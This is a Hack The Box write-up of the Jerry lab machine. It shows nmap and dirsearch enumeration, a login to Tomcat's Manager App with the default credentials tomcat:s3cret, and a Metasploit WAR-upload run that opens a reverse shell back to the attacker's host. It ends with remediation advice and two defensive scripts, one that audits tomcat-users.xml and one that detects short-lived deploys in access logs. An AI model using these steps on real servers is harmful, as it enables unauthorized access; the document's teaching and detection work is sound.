
Hack The Box - Jerry Writeup

Antonette Caldwell • October 29, 2021

retired easy windows arbitrary file upload file misconfigurations

Machine: Jerry

Summary

This write-up has been updated on February 17, 2022.

Achievement: October 17, 2021

Jerry is a Windows machine with an Apache Tomcat server set up. As I go through the steps, you will see that the server is vulnerable to arbitrary file upload, which can lead to Command Injection, XSS attacks, Denial of Service attacks, and Remote Code Execution.

  1. Pre-engagement Interactions (not applicable)
  2. Intelligence Gathering
    • Internal Footprinting
      • NMap scan completed

Port 8080 is open, and nmap lists its service as http-proxy.

nmap 10.10.10.95 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 20:55 GMT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.062s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds

We can also take a look to see what type of OS and service is behind port 8080.

sudo nmap -A -O -Pn jerry.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 20:58 GMT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.061s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   64.06 ms 10.10.14.1
2   64.18 ms jerry.htb (10.10.10.95)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.65 seconds

You can also check the website with a browser or with curl.

curl -v http://jerry.htb:8080
*   Trying 10.10.10.95:8080...
* Connected to jerry.htb (10.10.10.95) port 8080 (#0)
> GET / HTTP/1.1
> Host: jerry.htb:8080
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Content-Type: text/html;charset=ISO-8859-1
< Transfer-Encoding: chunked
< Date: Thu, 17 Feb 2022 04:04:24 GMT
<

  3. Threat Modeling (not applicable)
  4. Vulnerability Analysis
    • Vulnerability Testing
    • Vulnerability Scanning
      • Web Application Scanner tool - dirsearch
    • Vulnerability Validation
      • Check for default credentials

After scanning to confirm that no other ports were open, I selected a tool to scan the website. I will use a couple of different tools to illustrate the differences between them, and to show that there are several ways to enumerate and scan a website for vulnerabilities. I also checked the website for anything of interest.

Apache Tomcat/7.0.88

Apache Tomcat is configured with several features: Server Status, Manager App, and Host Manager. Normally, when you configure an Apache Tomcat server, an account/role should be configured for access to Server Status, Manager App, and Host Manager. If none has been configured, a generic login could work.

Here is an example of a wordlist that has generic logins.

dirsearch -u http://jerry.htb:8080/

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877

Output File: /home/user/.dirsearch/reports/jerry.htb/_22-02-16_21-35-59.txt

Error Log: /home/user/.dirsearch/logs/errors-22-02-16_21-35-59.log

Target: http://jerry.htb:8080/

[21:35:59] Starting: 
[21:36:08] 400 -    0B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:36:08] 400 -    0B  - /a%5c.aspx
[21:36:18] 302 -    0B  - /docs  ->  /docs/
[21:36:18] 200 -   19KB - /docs/
[21:36:19] 302 -    0B  - /examples  ->  /examples/
[21:36:19] 200 -    1KB - /examples/
[21:36:19] 200 -    7KB - /examples/servlets/index.html
[21:36:19] 200 -  928B  - /examples/servlets/servlet/RequestHeaderExample
[21:36:19] 200 -  637B  - /examples/servlets/servlet/CookieExample
[21:36:19] 200 -  716B  - /examples/jsp/snp/snoop.jsp
[21:36:19] 200 -   21KB - /favicon.ico
[21:36:21] 401 -    2KB - /host-manager/html
[21:36:21] 302 -    0B  - /host-manager/  ->  /host-manager/html
[21:36:22] 200 -   11KB - /index.jsp
[21:36:24] 302 -    0B  - /manager  ->  /manager/
[21:36:24] 401 -    2KB - /manager/status/all
[21:36:24] 401 -    2KB - /manager/html
[21:36:24] 401 -    2KB - /manager/html/
[21:36:24] 302 -    0B  - /manager/  ->  /manager/html

Task Completed

I reran dirsearch recursively with different options. It returned a lot of results, so I snipped the output for brevity.

dirsearch -u http://jerry.htb:8080/ -e html,js,jsp -r

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: html, js, jsp | HTTP method: GET | Threads: 30 | Wordlist size: 9926

Output File: /home/user/.dirsearch/reports/jerry.htb/_22-02-16_21-37-04.txt

Error Log: /home/user/.dirsearch/logs/errors-22-02-16_21-37-04.log

Target: http://jerry.htb:8080/

[21:37:05] Starting: 
[21:37:12] 400 -    0B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:37:13] 400 -    0B  - /a%5c.aspx
[21:37:21] 200 -   19KB - /docs/     (Added to queue)
[21:37:21] 302 -    0B  - /docs  ->  /docs/
[21:37:21] 302 -    0B  - /examples  ->  /examples/     (Added to queue)
[21:37:21] 200 -    1KB - /examples/
[21:37:21] 200 -  716B  - /examples/jsp/snp/snoop.jsp
[21:37:21] 200 -    7KB - /examples/servlets/index.html
[21:37:21] 200 -  928B  - /examples/servlets/servlet/RequestHeaderExample
[21:37:21] 200 -  637B  - /examples/servlets/servlet/CookieExample
[21:37:21] 200 -   21KB - /favicon.ico
[21:37:22] 302 -    0B  - /host-manager/  ->  /host-manager/html
[21:37:22] 401 -    2KB - /host-manager/html
[21:37:23] 200 -   11KB - /index.jsp
[21:37:25] 302 -    0B  - /manager  ->  /manager/     (Added to queue)
[21:37:25] 302 -    0B  - /manager/  ->  /manager/html
[21:37:25] 401 -    2KB - /manager/html
[21:37:25] 401 -    2KB - /manager/html/     (Added to queue)
[21:37:25] 401 -    2KB - /manager/status/all
--snippet--
[21:42:47] Starting: manager/..;/
[21:42:56] 400 -    0B  - /manager/..;/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:42:57] 400 -    0B  - /manager/..;/a%5c.aspx
[21:43:04] 302 -    0B  - /manager/..;/docs  ->  /docs/
[21:43:04] 200 -   19KB - /manager/..;/docs/     (Added to queue)
[21:43:05] 302 -    0B  - /manager/..;/examples  ->  /examples/
[21:43:05] 200 -    1KB - /manager/..;/examples/     (Added to queue)
[21:43:05] 200 -  728B  - /manager/..;/examples/jsp/snp/snoop.jsp
[21:43:05] 200 -    7KB - /manager/..;/examples/servlets/index.html
[21:43:05] 200 -  637B  - /manager/..;/examples/servlets/servlet/CookieExample
[21:43:05] 200 -  928B  - /manager/..;/examples/servlets/servlet/RequestHeaderExample
[21:43:05] 200 -   21KB - /manager/..;/favicon.ico
[21:43:06] 302 -    0B  - /manager/..;/host-manager/  ->  /manager/..;/host-manager/html
[21:43:06] 401 -    2KB - /manager/..;/host-manager/html
[21:43:07] 200 -   11KB - /manager/..;/index.jsp
[21:43:09] 302 -    0B  - /manager/..;/manager  ->  /manager/
[21:43:09] 401 -    2KB - /manager/..;/manager/html
[21:43:09] 302 -    0B  - /manager/..;/manager/  ->  /manager/html
[21:43:09] 401 -    2KB - /manager/..;/manager/status/all
[21:43:09] 401 -    2KB - /manager/..;/manager/html/     (Added to queue)
[21:43:17] Starting: manager/html/cgi-bin/
[21:43:29] 400 -    0B  - /manager/html/cgi-bin/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:43:30] 400 -    0B  - /manager/html/cgi-bin/a%5c.aspx
[21:43:56] Starting: manager/images/
[21:43:58] 302 -    0B  - /manager/images/..;/  ->  /manager/html
[21:44:04] 400 -    0B  - /manager/images/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:44:04] 400 -    0B  - /manager/images/a%5c.aspx
[21:44:10] 401 -    2KB - /manager/images/console/j_security_check
[21:44:14] 401 -    2KB - /manager/images/j_security_check
[21:44:24] Starting: manager/status/
[21:44:29] 404 -    2KB - /manager/status/%2e%2e//google.com
[21:44:29] 404 -    2KB - /manager/status/%2e%2e;/test
[21:44:29] 302 -    0B  - /manager/status/..;/  ->  /manager/html
[21:44:37] 400 -    0B  - /manager/status/\..\..\..\..\..\..\..\..\..\etc\passwd
[21:44:38] 400 -    0B  - /manager/status/a%5c.aspx

There seems to be a vulnerability on the server, for example: http://jerry.htb:8080/manager/..;/. The ..; sequence showed up multiple times on the other pages, but the Manager App is the one we want to get to. For more information on how Apache Tomcat is set up, check the Apache Tomcat website. The next step is to access the server by either bypassing the login or guessing the login.

Apache Tomcat has the generic login credentials tomcat:s3cret.

  5. Exploitation

Here is the error message returned when attempting to log in via the Manager App.

401 Unauthorized

You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.

For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

Note that for Tomcat 7 onwards, the roles required to use the manager application were changed from the single manager role to the following four roles. You will need to assign the role(s) required for the functionality you wish to access.

    manager-gui - allows access to the HTML GUI and the status pages
    manager-script - allows access to the text interface and the status pages
    manager-jmx - allows access to the JMX proxy and the status pages
    manager-status - allows access to the status pages only

The HTML interface is protected against CSRF but the text and JMX interfaces are not. To maintain the CSRF protection:

    Users with the manager-gui role should not be granted either the manager-script or manager-jmx roles.
    If the text or jmx interfaces are accessed through a browser (e.g. for testing since these interfaces are intended for tools not humans) then the browser must be closed afterwards to terminate the session.

For more information - please see the Manager App HOW-TO.

You can either use Metasploit to guess the Apache Tomcat login for the Manager App, or try it out yourself. I didn't look up the details on the Apache Tomcat website, so the first time around I missed what the next step was. I attempted a couple of login credentials and it didn't fail; the login box returned multiple times. So I tried without logging in, and received a 403 not authorized page. Once there, I realized that I could just use tomcat:s3cret, with which I was able to log in.

One of the features of Apache Tomcat is the ability to upload a WAR file to the server. For this step, I am using Metasploit.


msf6 > use exploit/multi/http/tomcat_mgr_upload 
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.7:1234 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Uk679N1wprmWnWn38mnqDmmY...
[*] Executing Uk679N1wprmWnWn38mnqDmmY...
[*] Undeploying Uk679N1wprmWnWn38mnqDmmY ...
[*] Undeployed at /manager/html/undeploy
[*] Command shell session 1 opened (10.10.14.7:1234 -> 10.10.10.95:49192 ) at 2022-02-16 22:32:00 +0000


Shell Banner:
Microsoft Windows [Version 6.3.9600]
-----


C:\apache-tomcat-7.0.88>

  6. Post Exploitation

Obtained the flags for both user and root.

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
--snippet--

root.txt
--snippet--
C:\Users\Administrator\Desktop\flags>

  7. Reporting

Several things stood out to me. The server was vulnerable to arbitrary file upload, and the underlying cause is that it was set up with the generic login/role tomcat:s3cret. It is highly recommended to create your own user/role, generate a secure password, and make sure that the password is not known to anyone else. You could use a secrets management service for this, depending on your infrastructure.
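One way to check a conf/tomcat-users.xml for the two problems this write-up touches on: the generic tomcat:s3cret login, and the role combination that the quoted 401 page says breaks the Manager App's CSRF protection. This is an added example, not part of the original write-up or of Tomcat; the function name, the sample config, and the "password is empty or equals the username" rule are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Credential pair shown on the Manager App 401 page quoted in this write-up.
KNOWN_DEFAULTS = {("tomcat", "s3cret")}
# Per the 401 page: manager-gui users must not also hold these roles,
# because the text and JMX interfaces are not CSRF-protected.
UNPROTECTED_ROLES = {"manager-script", "manager-jmx"}

# Constructed sample config for the example.
SAMPLE_CONFIG = """
<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="deploy" roles="manager-gui,manager-script"/>
  <user username="monitor" password="Xq7!vR2#kLm9pT4z" roles="manager-status"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return a list of (username, finding_code) tuples in file order."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        # Some older configs use name= instead of username=.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}

        if (name, password) in KNOWN_DEFAULTS:
            findings.append((name, "DEFAULT_CREDENTIAL"))
        elif password == "" or password.lower() == name.lower():
            # Assumed rule for this example, not a Tomcat check.
            findings.append((name, "WEAK_PASSWORD"))

        if "manager-gui" in roles and roles & UNPROTECTED_ROLES:
            findings.append((name, "CSRF_ROLE_MIX"))
    return findings


if __name__ == "__main__":
    for user, code in audit_tomcat_users(SAMPLE_CONFIG):
        print(f"{user}: {code}")
```
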

Metasploit has a module that targets an Apache Tomcat server whose Manager App has the generic login tomcat:s3cret, and it can also upload a payload, which is a WAR file with a reverse shell. Once this ran, I was able to get a shell on the server and obtain the necessary flags.

I also used Wireshark to watch the packet traffic occurring while I used the Metasploit module. Here is the traffic below, filtered to just the HTTP traffic.

tshark -r metasploit-upload.pcapng | grep HTTP
    4 0.072700178   10.10.14.7 → 10.10.10.95  HTTP 201 GET /manager/html HTTP/1.1 
    5 0.135688417  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
    9 0.135753492  10.10.10.95 → 10.10.14.7   HTTP 325 HTTP/1.1 401 Unauthorized  (text/html)
   18 0.197749842   10.10.14.7 → 10.10.10.95  HTTP 244 GET /manager/html HTTP/1.1 
   19 0.269562111  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   21 0.269675408  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   23 0.269727846  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   25 0.269776160  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   27 0.325929368  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   29 0.326037310  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   31 0.332547557  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   33 0.332665095  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   35 0.332712724  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   37 0.332756704  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   39 0.332801443  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   41 0.332846707  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   43 0.382272592  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
   45 0.382373463  10.10.10.95 → 10.10.14.7   HTTP 862 HTTP/1.1 200 OK  (text/html)
   50 0.453816006   10.10.14.7 → 10.10.10.95  TCP 1325 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1  [TCP segment of a reassembled PDU]
   63 0.517718037   10.10.14.7 → 10.10.10.95  HTTP 747 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1 
   64 0.522257125  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
   68 0.522418411  10.10.10.95 → 10.10.14.7   HTTP 261 HTTP/1.1 401 Unauthorized  (text/html)
   80 0.584331352   10.10.14.7 → 10.10.10.95  TCP 1325 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1  [TCP segment of a reassembled PDU]
   95 0.693843233   10.10.14.7 → 10.10.10.95  HTTP 790 POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=BC58CA14023AC9145CCEF803D866C9C9 HTTP/1.1 
   99 0.956742771  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  101 0.956800426  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  103 0.956822590  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  105 0.956842795  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  107 1.021571147  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  109 1.021666014  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  111 1.021693043  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  113 1.021717117  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  115 1.022575004  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  117 1.022642553  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  119 1.022661776  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  121 1.022680616  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  123 1.076915044  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  125 1.076982303  10.10.10.95 → 10.10.14.7   HTTP 1321 HTTP/1.1 200 OK  (text/html)
  134 1.255338945   10.10.14.7 → 10.10.10.95  HTTP 234 GET /6HQaGcvmG/BcG7baXoq31EqfXIq0oI9d5rvFB73LZ.jsp HTTP/1.1 
  135 1.320526520  10.10.10.95 → 10.10.14.7   HTTP 154 HTTP/1.1 200 OK 
  147 1.381513312   10.10.14.7 → 10.10.10.95  HTTP 201 GET /manager/html HTTP/1.1 
  150 1.444527646  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
  154 1.444590638  10.10.10.95 → 10.10.14.7   HTTP 325 HTTP/1.1 401 Unauthorized  (text/html)
  166 1.532002685   10.10.14.7 → 10.10.10.95  HTTP 244 GET /manager/html HTTP/1.1 
  171 1.606737194  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  173 1.606788963  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  175 1.606806190  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  177 1.607149734  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  179 1.664635737  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  181 1.664747433  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  183 1.664799377  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  185 1.664846724  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  187 1.664891883  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  189 1.664935716  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  191 1.671907371  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  193 1.672036840  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  195 1.720850260  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  197 1.720977321  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  199 1.721030291  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  201 1.721066724  10.10.10.95 → 10.10.14.7   HTTP 247 HTTP/1.1 200 OK  (text/html)
  206 1.787931364   10.10.14.7 → 10.10.10.95  HTTP 421 POST /manager/html/undeploy?path=/6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=B326C53FAFD9721283DD6ECA7D42263A HTTP/1.1 
  207 1.851322502  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 401 Unauthorized  [TCP segment of a reassembled PDU]
  211 1.851601810  10.10.10.95 → 10.10.14.7   HTTP 261 HTTP/1.1 401 Unauthorized  (text/html)
  220 1.913337705   10.10.14.7 → 10.10.10.95  HTTP 464 POST /manager/html/undeploy?path=/6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=B326C53FAFD9721283DD6ECA7D42263A HTTP/1.1 
  222 2.595876649  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  224 2.595946695  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  226 2.595961324  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  228 2.595973168  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  230 2.650887246  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  232 2.650959017  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  234 2.650971562  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  236 2.650982343  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  238 2.656114925  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  240 2.656154410  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  242 2.656166248  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  244 2.656176872  10.10.10.95 → 10.10.14.7   TCP 1325 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
  246 2.707231594  10.10.10.95 → 10.10.14.7   HTTP 930 HTTP/1.1 200 OK  (text/html)
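
The capture shows a recognizable order of requests from one client: a POST to /manager/html/upload, a GET to a JSP under the new context, then a POST to /manager/html/undeploy for that same context, all within about two seconds. The following added example (not part of the original write-up) looks for that short-lived deploy sequence in Tomcat access logs. It assumes the access log uses the "common" pattern; the function names, the 60-second window, and the sample log lines are constructed for illustration, with paths mirroring the capture above.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

# Constructed sample log. Paths mirror the capture above; times, sizes, nonces
# and the 10.0.0.5 admin entries are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - admin [16/Feb/2022:09:00:00 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 18000
10.0.0.5 - admin [16/Feb/2022:11:30:00 +0000] "POST /manager/html/undeploy?path=/shop&org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 17000
10.10.14.7 - - [16/Feb/2022:22:31:58 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.7 - tomcat [16/Feb/2022:22:31:58 +0000] "GET /manager/html HTTP/1.1" 200 19000
10.10.14.7 - - [16/Feb/2022:22:31:59 +0000] "POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 401 2536
10.10.14.7 - tomcat [16/Feb/2022:22:31:59 +0000] "POST /manager/html/upload?path=6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 19500
10.10.14.7 - - [16/Feb/2022:22:31:59 +0000] "GET /6HQaGcvmG/BcG7baXoq31EqfXIq0oI9d5rvFB73LZ.jsp HTTP/1.1" 200 -
10.10.14.7 - tomcat [16/Feb/2022:22:32:00 +0000] "POST /manager/html/undeploy?path=/6HQaGcvmG&org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 17000
"""


def parse_line(line):
    """Return (client, user, time, method, target, status) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, user, ts, method, target, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return client, user, when, method, target, int(status)


def find_short_lived_deploys(log_text, window=timedelta(seconds=60)):
    """Flag upload -> hits on the new context -> undeploy by one client inside `window`."""
    last_upload = {}   # client -> time of most recent successful WAR upload
    app_hits = []      # (client, time, path) for successful non-manager requests
    alerts = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None or event[5] != 200:
            continue   # unparsable line, or the 401 challenge before Basic auth
        client, user, when, method, target, _ = event
        url = urlsplit(target)
        if method == "POST" and url.path == "/manager/html/upload":
            last_upload[client] = when
        elif method == "POST" and url.path == "/manager/html/undeploy":
            context = "/" + parse_qs(url.query).get("path", [""])[0].strip("/")
            started = last_upload.pop(client, None)
            if started is None or when - started > window or context == "/":
                continue   # no recent upload by this client: ordinary admin work
            hits = sum(1 for c, t, p in app_hits
                       if c == client and started <= t <= when
                       and p.startswith(context + "/"))
            alerts.append({"client": client, "user": user, "context": context,
                           "lifetime_s": int((when - started).total_seconds()),
                           "hits": hits})
        elif not url.path.startswith("/manager/"):
            app_hits.append((client, when, url.path))
    return alerts


if __name__ == "__main__":
    for alert in find_short_lived_deploys(SAMPLE_LOG):
        print(alert)
```

The admin's upload and the undeploy two and a half hours later fall outside the window and are not flagged; only the one-second deploy, request, undeploy sequence is.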